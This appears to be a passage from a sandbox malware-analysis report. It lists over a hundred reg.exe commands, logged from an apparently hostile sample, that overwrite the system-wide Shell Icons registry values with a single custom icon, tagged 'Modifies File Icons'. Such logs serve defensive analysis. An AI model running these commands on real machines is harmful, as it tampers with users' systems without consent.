C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 23 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f11⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 24 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f11⤵
- Modifies File Icons
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 25 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f11⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 26 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f11⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 27 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f11⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 28 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f11⤵
- Modifies File Icons
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 29 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f11⤵
- Modifies Shortcut Icons
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 30 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f11⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 31 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f11⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 32 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f11⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 33 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f11⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 34 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f11⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 35 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f11⤵
- Modifies File Icons
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 36 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f11⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 37 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f11⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 38 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f11⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 39 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f11⤵
- Modifies File Icons
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 40 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f11⤵
- Modifies File Icons
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 41 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f11⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 42 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f11⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 43 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f11⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 44 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f11⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 45 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f11⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 46 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f11⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 47 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f11⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 48 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f11⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 49 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f11⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 50 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f11⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 51 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f11⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 52 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f11⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 53 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f11⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 54 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f11⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 55 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f11⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 56 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f11⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 57 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f11⤵
- Modifies File Icons
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 58 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f11⤵
- Modifies File Icons
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 59 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f11⤵
- Modifies File Icons
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 60 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f11⤵
- Modifies File Icons
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 61 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f11⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 62 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f11⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 63 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f11⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 64 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f11⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 65 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f11⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 66 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f11⤵
- Modifies File Icons
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 67 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f11⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 68 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f11⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 69 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f11⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 70 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f11⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 71 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f11⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 72 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f11⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 73 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f11⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 74 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f11⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 75 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f11⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 76 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f11⤵
- Modifies File Icons
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 77 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f11⤵
- Modifies File Icons
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 78 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f11⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 79 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f11⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 80 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f11⤵
- Modifies File Icons
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 81 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f11⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 82 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f11⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 83 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f11⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 84 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f11⤵
- Modifies File Icons
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 85 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f11⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 86 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f11⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 87 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f11⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 88 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f11⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 89 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f11⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 90 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f11⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 91 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f11⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 92 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f11⤵
- Modifies File Icons
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 93 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f11⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 94 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f11⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 95 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f11⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 96 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f11⤵
- Modifies File Icons
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 97 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f11⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 98 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f11⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 99 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f11⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 100 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f11⤵
- Modifies File Icons
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 101 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f11⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 102 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f11⤵
- Modifies File Icons
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 103 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f11⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 104 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f11⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 105 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f11⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 106 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f11⤵
- Modifies File Icons
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 107 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f11⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 108 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f11⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 109 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f11⤵
- Modifies File Icons
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 110 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f11⤵
- Modifies File Icons
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 111 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f11⤵
- Modifies File Icons
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 112 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f11⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 113 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f11⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 114 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f11⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 115 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f11⤵
- Modifies File Icons
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 116 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f11⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 117 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f11⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 118 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f11⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 119 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f11⤵
- Modifies File Icons
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 120 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f11⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 121 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f11⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 122 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f11⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 123 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f11⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 124 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f11⤵
- Modifies File Icons
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 125 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f11⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 126 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f11⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 127 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f11⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 128 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f11⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 129 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f11⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 130 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f11⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 131 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f11⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 132 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f11⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 133 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f11⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 134 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f11⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 135 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f11⤵
- Modifies File Icons
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 136 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f11⤵
- Modifies File Icons
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 137 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f11⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 138 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f11⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 139 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f11⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 140 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f11⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 141 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f11⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 142 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f11⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 143 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f11⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 144 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f11⤵
- Modifies File Icons
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 145 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f11⤵
- Modifies File Icons
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 146 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f11⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 147 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f11⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 148 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f11⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 149 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f11⤵
-
